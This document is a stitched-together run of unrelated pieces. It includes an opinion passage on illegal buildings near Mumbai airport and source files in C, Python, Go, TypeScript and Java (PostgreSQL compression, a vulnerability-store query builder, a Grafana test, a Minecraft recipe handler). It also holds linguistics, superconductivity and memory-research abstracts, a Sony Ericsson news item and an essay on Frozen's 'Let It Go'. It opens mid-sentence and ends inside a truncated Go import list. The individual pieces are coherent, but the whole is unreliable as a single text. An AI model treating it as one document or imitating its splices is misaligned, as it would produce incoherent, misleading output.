While fighting for his client, the lawyer may learn that during safety audits of the factory, the boiler, though malfunctioning, was not removed. It is his public duty then to fight for that boiler to be removed - for the greater, common good.I fly in to Mumbai very often for work. Every time we land, it is a thud, thud, thud, instead of a smooth landing. I have talked to so many Mumbai pilots, who, when I tell them about the landings say to me, 'do you even know the obstacles we face?' Look at the slums near the airport, in case of an accident, you may have 5,000 to 10,000 lives gone in a trice. The combination a plane crash can unleash - airplane fuel, a fire and then oxygen (the oxygen masks) - you have a lethal formula.There are two kinds of buildings, those that are absolutely illegal, with no permissions at all, and those who have got permissions because airport authority officials are in collusion with developers.People need to wake up. Today, everybody is blaming Yeshwanth Shenoy. When there is an air crash, they will not blame Yeshwanth Shenoy, but ask why these buildings were allowed in the first place. Obstacles threaten even those whose buildings do not flout the norms, but are in the vicinity. Unfortunately, in this country the hardest hit are those that follow the laws.There is cynicism that the demolition will never take place, this will be challenged You will not have to wait for 20 or 30 years for an air crash, I am guaranteeing this. Science and Mathematics does not wait for anybody.First of all, people have to look at the rationale behind a demolition. Then, they must come together, unite, as that is their strength and send the erring developer to jail. With these corrupt builders cooling their heels in Arthur Road jail, Mumbai will be a better city.I am already a marked man. I have received threats. But then God gives life and God takes it away. |
/*
* Compress the input data to the output buffer until we run out of input
* data. Each time the output buffer falls below the compression bound for
* the input buffer, invoke the archive_contents() method for then next sink.
*
* Note that since we're compressing the input, it may very commonly happen
* that we consume all the input data without filling the output buffer. In
* that case, the compressed representation of the current input data won't
* actually be sent to the next bbsink until a later call to this function,
* or perhaps even not until bbsink_lz4_end_archive() is invoked.
*/
static void
bbsink_lz4_archive_contents(bbsink *sink, size_t avail_in)
{
	bbsink_lz4 *mysink = (bbsink_lz4 *) sink;
	size_t		compressedSize;
	size_t		avail_in_bound;

	/* Worst-case output size for avail_in bytes under these preferences. */
	avail_in_bound = LZ4F_compressBound(avail_in, &mysink->prefs);

	/*
	 * If the space left in the next sink's buffer cannot be guaranteed to
	 * hold the compressed input, flush what has been buffered so far.
	 */
	if ((mysink->base.bbs_next->bbs_buffer_length - mysink->bytes_written) <
		avail_in_bound)
	{
		bbsink_archive_contents(sink->bbs_next, mysink->bytes_written);
		mysink->bytes_written = 0;
	}

	/*
	 * Compress directly into the next sink's buffer, after any bytes
	 * already written there; LZ4F may buffer internally and emit nothing.
	 */
	compressedSize = LZ4F_compressUpdate(mysink->ctx,
										 mysink->base.bbs_next->bbs_buffer + mysink->bytes_written,
										 mysink->base.bbs_next->bbs_buffer_length - mysink->bytes_written,
										 (uint8 *) mysink->base.bbs_buffer,
										 avail_in,
										 NULL);

	if (LZ4F_isError(compressedSize))
		elog(ERROR, "could not compress data: %s",
			 LZ4F_getErrorName(compressedSize));

	/* Track how much compressed output now sits in the next sink's buffer. */
	mysink->bytes_written += compressedSize;
}
def find_max_values(table_1, table_2):
    """Return the combined coordinate extrema of two tables.

    Both tables are converted via ``create_array()`` into (x, y) arrays and
    the extrema are taken over the union of the two point sets.

    :return: ``(max_x, min_x, max_y, min_y, ratio)`` where ``ratio`` is the
        y-extent divided by the x-extent of the combined data.
    """
    x1, y1 = create_array(table_1)
    x2, y2 = create_array(table_2)

    all_x = np.append(x1, x2)
    all_y = np.append(y1, y2)

    min_x, max_x = all_x.min(), all_x.max()
    min_y, max_y = all_y.min(), all_y.max()

    ratio = (max_y - min_y) / (max_x - min_x)
    return max_x, min_x, max_y, min_y, ratio
def patch(self, request, pk, format=None):
    """Partially update an AvailableBidders record.

    :param request: DRF request carrying the partial field updates
    :param pk: bidder perdet identifying the record
    :param format: DRF format suffix (unused here)
    :returns: 204 on success, 400 when the payload fails validation
    """
    bidder = get_object_or_404(AvailableBidders, bidder_perdet=pk)
    # The acting user is stamped onto the record for auditing.
    user = UserProfile.objects.get(user=self.request.user)
    serializer = self.serializer_class(bidder, data=request.data, partial=True)
    if serializer.is_valid():
        # NOTE(review): datetime.now() is timezone-naive; if the project
        # uses aware datetimes, django.utils.timezone.now() is safer.
        serializer.save(last_editing_user=user, update_date=datetime.now())
        return Response(status=status.HTTP_204_NO_CONTENT)
    else:
        return Response(status=status.HTTP_400_BAD_REQUEST)
<reponame>deepeshhada/HyperTeNet
import pickle
import itertools
import pdb
from time import time
from collections import defaultdict
import numpy as np
import scipy.sparse as sp
from data.dataset import Dataset
from data.tenet_dataset import TenetDataset
from utils import utils
import torch
class EmbedDataset(TenetDataset):
    """TenetDataset extended with precomputed k-NN graph edge indices for
    the user, list and item entities, loaded from a pickle whose path is
    derived from the embedding type, k, and dataset name."""

    def __init__(self, args):
        # args is expected to provide at least: path, embed_type, knn_k,
        # dataset (plus whatever TenetDataset itself requires).
        TenetDataset.__init__(self, args)
        # The pickle holds a 3-tuple of (user, list, item) edge indices.
        self.user_edge_index, self.list_edge_index, self.item_edge_index = utils.load_pickle(args.path + '/' + args.embed_type + '/' + str(args.knn_k) + '/' + args.dataset + '.user_list_item_knn.pkl')
|
<filename>internal/vulnstore/postgres/querybuilder.go
package postgres
import (
"fmt"
"strconv"
"strings"
"github.com/doug-martin/goqu/v8"
_ "github.com/doug-martin/goqu/v8/dialect/postgres"
"github.com/rs/zerolog/log"
"github.com/quay/claircore"
"github.com/quay/claircore/internal/vulnstore"
"github.com/quay/claircore/libvuln/driver"
)
// buildGetQuery validates an IndexRecord and creates a query string for
// vulnerability matching. (Comment previously referred to "getQueryBuilder".)
//
// The WHERE clause always matches on the package name/kind (OR'd with the
// source package when one is present), adds one condition per distinct
// matcher in opts.Matchers, and — when opts.VersionFiltering is set — a
// version-range containment test on the record's normalized version.
func buildGetQuery(record *claircore.IndexRecord, opts *vulnstore.GetOpts) (string, error) {
	matchers := opts.Matchers
	psql := goqu.Dialect("postgres")
	exps := []goqu.Expression{}
	// Add package name as first condition in query.
	if record.Package.Name == "" {
		return "", fmt.Errorf("IndexRecord must provide a Package.Name")
	}
	packageQuery := goqu.And(
		goqu.Ex{"package_name": record.Package.Name},
		goqu.Ex{"package_kind": record.Package.Kind},
	)
	exps = append(exps, packageQuery)
	// If the package has a source, convert the first expression to an OR.
	if record.Package.Source.Name != "" {
		sourcePackageQuery := goqu.And(
			goqu.Ex{"package_name": record.Package.Source.Name},
			goqu.Ex{"package_kind": record.Package.Source.Kind},
		)
		or := goqu.Or(
			packageQuery,
			sourcePackageQuery,
		)
		exps[0] = or
	}
	// Add one expression per matcher, skipping duplicates.
	seen := make(map[driver.MatchConstraint]struct{})
	for _, m := range matchers {
		if _, ok := seen[m]; ok {
			continue
		}
		var ex goqu.Ex
		switch m {
		case driver.PackageModule:
			ex = goqu.Ex{"package_module": record.Package.Module}
		case driver.DistributionDID:
			ex = goqu.Ex{"dist_id": record.Distribution.DID}
		case driver.DistributionName:
			ex = goqu.Ex{"dist_name": record.Distribution.Name}
		case driver.DistributionVersionID:
			ex = goqu.Ex{"dist_version_id": record.Distribution.VersionID}
		case driver.DistributionVersion:
			ex = goqu.Ex{"dist_version": record.Distribution.Version}
		case driver.DistributionVersionCodeName:
			ex = goqu.Ex{"dist_version_code_name": record.Distribution.VersionCodeName}
		case driver.DistributionPrettyName:
			ex = goqu.Ex{"dist_pretty_name": record.Distribution.PrettyName}
		case driver.DistributionCPE:
			ex = goqu.Ex{"dist_cpe": record.Distribution.CPE}
		case driver.DistributionArch:
			ex = goqu.Ex{"dist_arch": record.Distribution.Arch}
		case driver.RepositoryName:
			ex = goqu.Ex{"repo_name": record.Repository.Name}
		default:
			return "", fmt.Errorf("was provided unknown matcher: %v", m)
		}
		exps = append(exps, ex)
		seen[m] = struct{}{}
	}
	if opts.VersionFiltering {
		// Render the normalized version as a postgres int[] literal and
		// require vulnerable_range to contain it.
		v := &record.Package.NormalizedVersion
		var lit strings.Builder
		b := make([]byte, 0, 16)
		lit.WriteString("'{")
		for i := 0; i < 10; i++ {
			if i != 0 {
				lit.WriteByte(',')
			}
			lit.Write(strconv.AppendInt(b, int64(v.V[i]), 10))
		}
		lit.WriteString("}'::int[]")
		exps = append(exps, goqu.And(
			goqu.C("version_kind").Eq(v.Kind),
			goqu.L("vulnerable_range @> "+lit.String()),
		))
	}
	query := psql.Select(
		"id",
		"name",
		"description",
		"issued",
		"links",
		"severity",
		"normalized_severity",
		"package_name",
		"package_version",
		"package_module",
		"package_arch",
		"package_kind",
		"dist_id",
		"dist_name",
		"dist_version",
		"dist_version_code_name",
		"dist_version_id",
		"dist_arch",
		"dist_cpe",
		"dist_pretty_name",
		"arch_operation",
		"repo_name",
		"repo_key",
		"repo_uri",
		"fixed_in_version",
		"updater",
	).From("vuln").Where(exps...)
	sql, _, err := query.ToSQL()
	if err != nil {
		log.Debug().
			Err(err).
			Msg("error generating sql")
		// Fixed: the error was previously logged but swallowed, returning
		// an empty SQL string with a nil error; propagate it instead.
		return "", err
	}
	return sql, nil
}
|
<reponame>shionAoi/sicuy-angular
import {Injectable} from '@angular/core';
import {AddPoolMutation} from './graphql/add-pool.mutation';
import {Pool, PoolInput, PoolUpdate} from '../../../../api/graphql';
import {map} from 'rxjs/operators';
import {Observable} from 'rxjs';
import {UpdatePoolMutation} from './graphql/update-pool.mutation';
import {ActivatePoolMutation} from './graphql/activate-pool.mutation';
import {DeactivatePoolMutation} from './graphql/deactivate-pool.mutation';
import {RemovePoolMutation} from './graphql/remove-pool.mutation';
@Injectable({
  providedIn: 'root'
})
export class PoolsService {

  constructor(private addPoolMutation: AddPoolMutation,
              private updatePoolMutation: UpdatePoolMutation,
              private deactivatePoolMutation: DeactivatePoolMutation,
              private removePoolMutation: RemovePoolMutation,
              private activatePoolMutation: ActivatePoolMutation) {
  }

  /** Creates a new pool and emits the pool returned by the server. */
  addPool(pool: PoolInput): Observable<Pool> {
    return this.addPoolMutation
      .mutate({ pool })
      .pipe(map(({ data }) => data.addPool));
  }

  /** Applies an update to the pool identified by `idPool`. */
  updatePool(idPool: string, update: PoolUpdate): Observable<Pool> {
    return this.updatePoolMutation
      .mutate({ idPool, update })
      .pipe(map(({ data }) => data.updatePool));
  }

  /** Activates or deactivates a pool depending on `newStatus`. */
  updatePoolStatus(idPool: string, newStatus: boolean): Observable<boolean> {
    if (newStatus) {
      return this.activatePoolMutation
        .mutate({ idPool })
        .pipe(map(({ data }) => data.activatePool));
    }
    return this.deactivatePoolMutation
      .mutate({ idPool })
      .pipe(map(({ data }) => data.deactivatePool));
  }

  /** Removes a pool; emits whether the deletion succeeded. */
  removePool(idPool: string): Observable<boolean> {
    return this.removePoolMutation
      .mutate({ idPool })
      .pipe(map(({ data }) => data.deletePool));
  }
}
|
package alerting
import (
"encoding/json"
"fmt"
"io"
"net/http"
"testing"
"github.com/stretchr/testify/require"
"github.com/grafana/grafana/pkg/services/ngalert/notifier/channels_config"
"github.com/grafana/grafana/pkg/services/org"
"github.com/grafana/grafana/pkg/services/user"
"github.com/grafana/grafana/pkg/tests/testinfra"
)
// TestIntegrationAvailableChannels checks that the /api/alert-notifiers
// endpoint returns exactly the notifier channels the backend declares.
func TestIntegrationAvailableChannels(t *testing.T) {
	testinfra.SQLiteIntegrationTest(t)

	// Spin up a Grafana instance with unified alerting enabled.
	dir, cfgPath := testinfra.CreateGrafDir(t, testinfra.GrafanaOpts{
		DisableLegacyAlerting: true,
		EnableUnifiedAlerting: true,
		DisableAnonymous:      true,
		AppModeProduction:     true,
	})
	addr, store := testinfra.StartGrafana(t, dir, cfgPath)

	// Create a user to make authenticated requests
	createUser(t, store, user.CreateUserCommand{
		DefaultOrgRole: string(org.RoleEditor),
		Password:       "password",
		Login:          "grafana",
	})

	notifiersURL := fmt.Sprintf("http://grafana:password@%s/api/alert-notifiers", addr)
	// nolint:gosec
	resp, err := http.Get(notifiersURL)
	require.NoError(t, err)
	t.Cleanup(func() {
		require.NoError(t, resp.Body.Close())
	})

	body, err := io.ReadAll(resp.Body)
	require.NoError(t, err)
	require.Equal(t, 200, resp.StatusCode)

	// The response must match the statically-declared notifier list.
	expJson, err := json.Marshal(channels_config.GetAvailableNotifiers())
	require.NoError(t, err)
	require.Equal(t, string(expJson), string(body))
}
|
The evolution of negation in French and Italian: Similarities and differences
This article examines similarities and differences in the evolution of both standard clause negation and n-word negation in French and Italian. The two languages differ saliently in the extent to which standard negation features postverbal markers. We suggest that a convergence of phonetic, prosodic, morphosyntactic, and pragmatic changes in the evolution of French may explain why the grammaticalization of the postverbal marker is significantly more advanced in that language. Two types of n-word negation must be considered: (i) those where the n-word occurs postverbally, and (ii) those where an n-word is positioned preverbally. In the former type, French allows deletion of the preverbal marker, whereas Italian does so to a much lesser extent. In the second type, French allows (indeed, normatively demands) insertion of a second preverbal negative marker, whereas Italian does not. We suggest that this is attributable to the respective positive vs negative etymologies of the n-words. In type (i) constructions, this etymological difference appears to make Italian a negative-concord language from the outset. In contrast, negative concord in Modern French has, to a large extent, developed gradually out of what was originally a reinforcement of standard negation by positive items with scalar properties. Our analysis suggests that the pace and form of grammaticalization cannot be attributed to any single cause, but is rather the result of a confluence of formal and functional factors. |
<gh_stars>100-1000
package mezz.jei.transfer;
import javax.annotation.Nullable;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Set;
import mezz.jei.config.IServerConfig;
import mezz.jei.config.ServerConfig;
import net.minecraft.world.entity.player.Player;
import net.minecraft.world.inventory.InventoryMenu;
import net.minecraft.world.inventory.Slot;
import net.minecraft.world.item.ItemStack;
import com.google.common.collect.ImmutableSet;
import mezz.jei.api.constants.VanillaRecipeCategoryUid;
import mezz.jei.api.gui.IRecipeLayout;
import mezz.jei.api.gui.ingredient.IGuiIngredient;
import mezz.jei.api.gui.ingredient.IGuiItemStackGroup;
import mezz.jei.api.helpers.IStackHelper;
import mezz.jei.api.recipe.transfer.IRecipeTransferError;
import mezz.jei.api.recipe.transfer.IRecipeTransferHandler;
import mezz.jei.api.recipe.transfer.IRecipeTransferHandlerHelper;
import mezz.jei.api.recipe.transfer.IRecipeTransferInfo;
import mezz.jei.config.ServerInfo;
import mezz.jei.gui.ingredients.GuiItemStackGroup;
import mezz.jei.network.Network;
import mezz.jei.network.packets.PacketRecipeTransfer;
import net.minecraft.network.chat.Component;
import net.minecraft.network.chat.TranslatableComponent;
import net.minecraft.world.item.crafting.CraftingRecipe;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
/**
 * Recipe transfer handler for the player's own inventory screen
 * ({@link InventoryMenu}), whose crafting grid is only 2x2. Recipes that fit
 * into the top-left 2x2 corner of a 3x3 grid are compacted into the player's
 * grid; anything larger is rejected with a user-facing error.
 */
public class PlayerRecipeTransferHandler implements IRecipeTransferHandler<InventoryMenu, CraftingRecipe> {
    private static final Logger LOGGER = LogManager.getLogger();

    // Matches available item stacks against recipe ingredients.
    private final IStackHelper stackHelper;
    // Factory for the various IRecipeTransferError results.
    private final IRecipeTransferHandlerHelper handlerHelper;
    // Slot layout of the target container; constructed with (1, 4, 9, 36) —
    // presumably crafting slots start at index 1 (4 slots) and inventory at
    // index 9 (36 slots); confirm against BasicRecipeTransferInfo.
    private final IRecipeTransferInfo<InventoryMenu, CraftingRecipe> transferHelper;

    public PlayerRecipeTransferHandler(IStackHelper stackhelper, IRecipeTransferHandlerHelper handlerHelper) {
        this.stackHelper = stackhelper;
        this.handlerHelper = handlerHelper;
        this.transferHelper = new BasicRecipeTransferInfo<>(InventoryMenu.class, CraftingRecipe.class, VanillaRecipeCategoryUid.CRAFTING, 1, 4, 9, 36);
    }

    @Override
    public Class<InventoryMenu> getContainerClass() {
        return transferHelper.getContainerClass();
    }

    @Override
    public Class<CraftingRecipe> getRecipeClass() {
        return transferHelper.getRecipeClass();
    }

    /**
     * Validates — and, when {@code doTransfer} is set, performs — the transfer
     * of the given recipe into the player's 2x2 crafting grid.
     *
     * @return null on success, otherwise an error describing why the transfer
     *         is not possible
     */
    @Nullable
    @Override
    public IRecipeTransferError transferRecipe(InventoryMenu container, CraftingRecipe recipe, IRecipeLayout recipeLayout, Player player, boolean maxTransfer, boolean doTransfer) {
        // Moving items around requires JEI to be present on the server.
        if (!ServerInfo.isJeiOnServer()) {
            Component tooltipMessage = new TranslatableComponent("jei.tooltip.error.recipe.transfer.no.server");
            return handlerHelper.createUserErrorWithTooltip(tooltipMessage);
        }

        if (!transferHelper.canHandle(container, recipe)) {
            return handlerHelper.createInternalError();
        }

        // Index the container's inventory and crafting slots by slot number.
        Map<Integer, Slot> inventorySlots = new HashMap<>();
        for (Slot slot : transferHelper.getInventorySlots(container, recipe)) {
            inventorySlots.put(slot.index, slot);
        }

        Map<Integer, Slot> craftingSlots = new HashMap<>();
        for (Slot slot : transferHelper.getRecipeSlots(container, recipe)) {
            craftingSlots.put(slot.index, slot);
        }

        IGuiItemStackGroup itemStackGroup = recipeLayout.getItemStacks();

        // Count the recipe's non-empty inputs and reject recipes that occupy
        // any 3x3 cell outside the top-left 2x2 corner (cells {0,1,3,4} are
        // the only ones a 2x2 grid can hold — see playerGridIndexes below).
        int inputCount = 0;
        {
            // indexes that do not fit into the player crafting grid
            Set<Integer> badIndexes = ImmutableSet.of(2, 5, 6, 7, 8);
            int inputIndex = 0;
            for (IGuiIngredient<ItemStack> ingredient : itemStackGroup.getGuiIngredients().values()) {
                if (ingredient.isInput()) {
                    if (!ingredient.getAllIngredients().isEmpty()) {
                        inputCount++;
                        if (badIndexes.contains(inputIndex)) {
                            Component tooltipMessage = new TranslatableComponent("jei.tooltip.error.recipe.transfer.too.large.player.inventory");
                            return handlerHelper.createUserErrorWithTooltip(tooltipMessage);
                        }
                    }
                    inputIndex++;
                }
            }
        }

        // compact the crafting grid into a 2x2 area
        List<IGuiIngredient<ItemStack>> guiIngredients = new ArrayList<>();
        for (IGuiIngredient<ItemStack> guiIngredient : itemStackGroup.getGuiIngredients().values()) {
            if (guiIngredient.isInput()) {
                guiIngredients.add(guiIngredient);
            }
        }
        // Map 3x3 input positions {0, 1, 3, 4} onto the four 2x2 grid slots.
        IGuiItemStackGroup playerInvItemStackGroup = new GuiItemStackGroup(null, 0);
        int[] playerGridIndexes = {0, 1, 3, 4};
        for (int i = 0; i < 4; i++) {
            int index = playerGridIndexes[i];
            if (index < guiIngredients.size()) {
                IGuiIngredient<ItemStack> ingredient = guiIngredients.get(index);
                playerInvItemStackGroup.init(i, true, 0, 0);
                playerInvItemStackGroup.set(i, ingredient.getAllIngredients());
            }
        }

        // Snapshot every available stack (crafting grid + inventory), counting
        // filled crafting slots and empty inventory slots along the way.
        Map<Integer, ItemStack> availableItemStacks = new HashMap<>();
        int filledCraftSlotCount = 0;
        int emptySlotCount = 0;

        for (Slot slot : craftingSlots.values()) {
            final ItemStack stack = slot.getItem();
            if (!stack.isEmpty()) {
                // The transfer moves existing grid contents out first, so the
                // player must be allowed to pick them up.
                if (!slot.mayPickup(player)) {
                    LOGGER.error("Recipe Transfer helper {} does not work for container {}. Player can't move item out of Crafting Slot number {}", transferHelper.getClass(), container.getClass(), slot.index);
                    return handlerHelper.createInternalError();
                }
                filledCraftSlotCount++;
                availableItemStacks.put(slot.index, stack.copy());
            }
        }

        for (Slot slot : inventorySlots.values()) {
            final ItemStack stack = slot.getItem();
            if (!stack.isEmpty()) {
                availableItemStacks.put(slot.index, stack.copy());
            } else {
                emptySlotCount++;
            }
        }

        // check if we have enough inventory space to shuffle items around to their final locations
        if (filledCraftSlotCount - inputCount > emptySlotCount) {
            Component message = new TranslatableComponent("jei.tooltip.error.recipe.transfer.inventory.full");
            return handlerHelper.createUserErrorWithTooltip(message);
        }

        // Match the available stacks against the compacted 2x2 ingredient set.
        RecipeTransferUtil.MatchingItemsResult matchingItemsResult = RecipeTransferUtil.getMatchingItems(stackHelper, availableItemStacks, playerInvItemStackGroup.getGuiIngredients());
        if (matchingItemsResult.missingItems.size() > 0) {
            Component message = new TranslatableComponent("jei.tooltip.error.recipe.transfer.missing");
            // Re-run the match against the original (uncompacted) layout —
            // presumably so the missing-item highlights line up with the
            // recipe slots as displayed; confirm against createUserErrorForSlots.
            matchingItemsResult = RecipeTransferUtil.getMatchingItems(stackHelper, availableItemStacks, itemStackGroup.getGuiIngredients());
            return handlerHelper.createUserErrorForSlots(message, matchingItemsResult.missingItems);
        }

        List<Integer> craftingSlotIndexes = new ArrayList<>(craftingSlots.keySet());
        Collections.sort(craftingSlotIndexes);

        List<Integer> inventorySlotIndexes = new ArrayList<>(inventorySlots.keySet());
        Collections.sort(inventorySlotIndexes);

        // check that the slots exist and can be altered
        for (Map.Entry<Integer, Integer> entry : matchingItemsResult.matchingItems.entrySet()) {
            int craftNumber = entry.getKey();
            int slotNumber = craftingSlotIndexes.get(craftNumber);
            if (slotNumber < 0 || slotNumber >= container.slots.size()) {
                LOGGER.error("Recipes Transfer Helper {} references slot {} outside of the inventory's size {}", transferHelper.getClass(), slotNumber, container.slots.size());
                return handlerHelper.createInternalError();
            }
        }

        if (doTransfer) {
            // The server performs the actual item movement.
            PacketRecipeTransfer packet = new PacketRecipeTransfer(matchingItemsResult.matchingItems, craftingSlotIndexes, inventorySlotIndexes, maxTransfer, false);
            Network.sendPacketToServer(packet);
        }

        return null;
    }
}
|
Times have not been good for Japanese-Swedish cell phone maker Sony Ericsson. The company has been stuck with disappointing figures and mediocre products. Now it is focusing on Android smartphones and that’s paying off, says Jan Uddenfeldt, chief technology officer and head of Sony Ericsson Silicon Valley.
Uddenfeldt made the comments in a speech at Sony Ericsson’s annual Business Innovations Forum at Stanford yesterday. He believes the company can triple its market share in the U.S. in the near future. Right now the company is in the “Others” category in smartphone market share listings.
Globally Sony Ericsson’s market share in smartphones is approximately 5 percent. So there’s room to grow. The company has also been phasing out its feature phones and focusing its product development on the Android operating system.
Android and a bunch of new Xperia phones will be the key drivers to growth, said Uddenfeldt. The company has announced six Xperia smartphones that run the Android Gingerbread operating system.
One thing the company is counting on is gaming. The Xperia Play is the first PlayStation Certified smartphone, meaning the phone can run downloadable versions of original PlayStation games and use the PlayStation logo. It even has a slide-out PlayStation controller.
Both AT&T and Verizon will sell the phone when it’s released, but there’s still no official release date available.
While Android is the main focus of the company, it will still have a door open for Windows Phone 7. But it won’t be making any products if the operating system doesn’t take off, Uddenfeldt said. (It did previously manufacture phones with Windows Mobile OS.) Sony Ericsson already announced in September that it will abandon the Symbian operating system for good. |
Elucidation of Crystal-Chemical Determination Factor of Magnetic Anisotropy in HTSC
Easy axes of magnetization at room temperature in REBa<sub>2</sub>Cu<sub>3</sub>O<sub>y</sub> (RE: rare earth) and Bi<sub>2</sub>Sr<sub>2</sub>Ca<sub>1-x</sub>RE<sub>x</sub>Cu<sub>2</sub>O<sub>y</sub> were clarified using their powders oriented in a static magnetic field. The easy axes clearly depended on the type of RE which could be mainly explained in terms of second-order Stevens factors and magnetic anisotropy of the CuO<sub>2</sub> plane. Furthermore, we found the difference in magnetic effects of Er<sup>3+</sup> for orientation through systematic evaluations of Er-doped Y123 and Bi2212 powders. This result means that magnetic anisotropies of RE<sup>3+</sup> ions are sensitive to not only the type of RE but also local structure of oxygen ions surrounding RE<sup>3+</sup> ions. |
There are plenty of operas about teenage girls—love-sick, obsessed, hysterical teenage girls who dance, scheme, and murder in a frenzy of musical passion. Disney Princess films are also about teenage girls—lonely, skinny, logical teenage girls who follow their hearts because the plot gives them no other option. The music Disney Princesses sing can be divided into three periods that correspond to distinct animation styles:
Onto these three periods we can map the themes of the princess anthems, the single song for which each princess is remembered:
The relative lack of variance in these songs tells us something important—while animation styles have changed, the aspirations of girlhood have not been radically altered.
But then there’s Frozen.
Elsa’s anthem, “Let It Go,” combines aspects from all three periods: Frozen is a computer animated film, Idina Menzel is a Tony Award-winning singer, and, most importantly, the song and the Snow Queen who sings it have an operatic legacy rooted in representations of madness and infirmity. “Let It Go” is a tribute to passion, spontaneity, and instinct—elements celebrated by both the opera (which nevertheless punishes the bearer severely) and the Disney film (which channels them into heterosexual romance). Frozen does neither.
Unlike the songs of longing for belonging that came before it, “Let It Go” insists that being like everyone else is bound to fail. It’s a coming out song often read as a queer anthem and easily interpreted to account for a number of stigmatized identities. As such, Elsa is a screen onto which may be projected our fantasies and fears. While her transformation into a shapely princess swaying in a sparkly gown with wispy blond hair may be familiar, the scene where this takes place, the way she looks back at the viewer, and the music she sings define Elsa as more ambiguous than she appears. Is Elsa sick, is she mentally ill, is she asexual, is she gay? What is Elsa and why does she resonate so strongly with young girls?
Elsa is like the women of 19th-century opera in her exclusion from the world the other characters comfortably occupy. Marred by magical ability, Elsa must isolate herself if she does not want to scar those she loves—or so the dialogue tells us. The imagery suggests an illness; Elsa behaves as if she were contagious. Indeed, she is consumptive like Mimi, but she is also betrayed like Tosca and scandalous like The Queen of the Night. As Catherine Clément says of women in the opera: “they suffer, they cry, they die…Glowing with tears, their decolletés cut to the heart, they expose themselves to the gaze of those who come to take pleasure in their pretend agonies.” Operatic women express their hysteria skillfully. At the pinnacle of her agony, Elsa builds a magnificent castle while singing her most beautiful song, a song that has itself become infectious. In its final moments, she exposes herself, only to slam the door on viewers who would like nothing more than to gawk at the excess.
Most princess anthems end satisfactorily on the tonic chord, their musical conclusions coinciding with lyrical expectations that assure the story will fulfill the princesses’ desires. For example, when Ariel wishes she could be “part of that world”, she sings a high F, which a trombone echoes an octave lower, reinforcing the song’s key and suggesting the narrative’s interest in giving Ariel what she wants. In “Someday My Prince Will Come,” Snow White’s final line repeats the home pitch no less than six times as if to insist the screenwriters pay attention. “Let It Go,” on the other hand, ends unresolved. The score establishes a sharp distinction between the assertive melodic phrase sung by Elsa, “The cold never bothered me anyway,” and the harmonic manifestation of the accompaniment. Elsa turns her back to the camera after singing the downward moving line, which ends rather abruptly on the tonic, while the chord that ought to have shifted with Elsa’s exit lingers in the icy upper register of the strings, as if refusing to acknowledge the message. Is the music condemning the singer’s difference by suggesting that her immunity to the elements is indicative of a physical or psychic malady?
Unlike Donizetti’s operatic heroine, Lucia, whose infamous “mad scene” prompts the chorus to weep for her, Elsa stares into the camera, eyebrow raised, as if daring the spectators to pity her. This is the look of a woman who refuses to capitulate to patriarchy. And with our endless covers and video parodies of “Let It Go” we have rallied to her defense. Rather than constrain her by Frozen’s story, “Let It Go” lets Elsa escape again into possibility. The new princess message, “Leave Me Alone,” is echoed by little girls everywhere.
Peter Conrad says of opera, “It is the song of our irrationality, of the instinctual savagery which our jobs and routines and our nonsinging voices belie, or the music our bodies make. It is an art devoted to love and death (and especially to the cryptic alliance between them); to the definition and the interchangeability of the sexes; to madness and devilment…” Such is also a fair description of Frozen, for what are its final moments but an act of love to stave off death, what is Elsa but a mad and devilish woman who revels in the impermanence of sexuality, what is a fairytale but a story full of savage beasts that prey on our emotions. “Let It Go” releases an archetype from the hollows of diva history into the digital world of children’s animation.
Headline Image: Disney’s Frozen. DVD screenshot via Jennfier Fleeger. |
/**
 * Write the data and return its write position.
 *
 * @param logIndex the log index; must be strictly greater than the last
 *                 stored log index (entries are append-only and ordered)
 * @param data     data to write
 * @return the position the data was written at
 */
public int appendData(final long logIndex, final byte[] data) {
    this.writeLock.lock();
    try {
        // Entries must be appended in strictly increasing index order.
        assert (logIndex > getLastLogIndex());
        final byte[] writeData = encodeData(data);
        return doAppend(logIndex, writeData);
    } finally {
        this.writeLock.unlock();
    }
}
def parse_results(result: dict, vari: list) -> dict:
    """Extract the ``'value'`` entry of each requested variable from `result`.

    The ``"Seq"`` variable is special-cased: its value is passed through
    ``get_sequence`` before being stored.

    Args:
        result: mapping of variable name -> {'value': ...}.
        vari: names of the variables to extract.

    Returns:
        Mapping of variable name -> extracted value.
    """
    return {
        name: get_sequence(result[name]['value']) if name == "Seq"
        else result[name]['value']
        for name in vari
    }
Foreign accents reduce false recognition rates in the DRM paradigm
ABSTRACT More cognitive resources are required to comprehend foreign-accented than native speech. Focusing these cognitive resources on resolving the acoustic mismatch between the foreign-accented input and listeners’ stored representations of spoken words can affect other cognitive processes. Across two studies, we explored whether processing foreign-accented speech reduces the activation of semantic information. This was achieved using the DRM paradigm, in which participants study word lists and typically falsely remember non-studied words (i.e. critical lures) semantically associated with the studied words. In two experiments, participants were presented with word lists spoken both by a native and a foreign-accented speaker. In both experiments we observed lower false recognition rates for the critical lures associated with word lists presented in a foreign accent, compared to native speech. In addition, participants freely recalled more studied words when they had been presented in a native, compared to a foreign, accent, although this difference only emerged in Experiment 2, where the foreign speaker had a very strong accent. These observations suggest that processing foreign-accented speech modulates the activation of semantic information. Highlights The DRM paradigm was used to explore whether semantic activation is reduced when processing foreign-accented speech. Across two experiments, false recognition of non-studied semantic associates was lower when word lists were presented in a foreign accent, compared to native speech. The above results suggest semantic activation may be reduced when processing foreign-accented speech. Additionally, it was found that when the foreign speaker had a mild accent, correct recall of studied words was uninfluenced. If the foreign speaker had a strong accent, however, correct recall of studied words was reduced. |
<gh_stars>0
import {
usePopupModel,
useInitialFocus,
useReturnFocus,
useCloseOnOutsideClick,
useCloseOnEscape,
useFocusRedirect,
} from '@workday/canvas-kit-react/popup';
import {createModelHook} from '@workday/canvas-kit-react/common';
// `useDialogModel` composes a popup model with the standard dialog behaviors.
// The config surface (defaults, required keys) is inherited unchanged from
// `usePopupModel`.
export const useDialogModel = createModelHook({
  defaultConfig: usePopupModel.defaultConfig,
  requiredConfig: usePopupModel.requiredConfig,
  // Reuse the popup context so dialog components interoperate with popup ones.
  contextOverride: usePopupModel.Context,
})(config => {
  const model = usePopupModel(config);

  // Layer dialog behaviors onto the base popup model; each hook registers the
  // behavior its name describes (focus management and close triggers).
  useInitialFocus(model);
  useReturnFocus(model);
  useCloseOnOutsideClick(model);
  useCloseOnEscape(model);
  useFocusRedirect(model);

  return model;
});
|
package tmdb
import (
"errors"
"fmt"
"time"
yaml "gopkg.in/yaml.v2"
"github.com/agnivade/levenshtein"
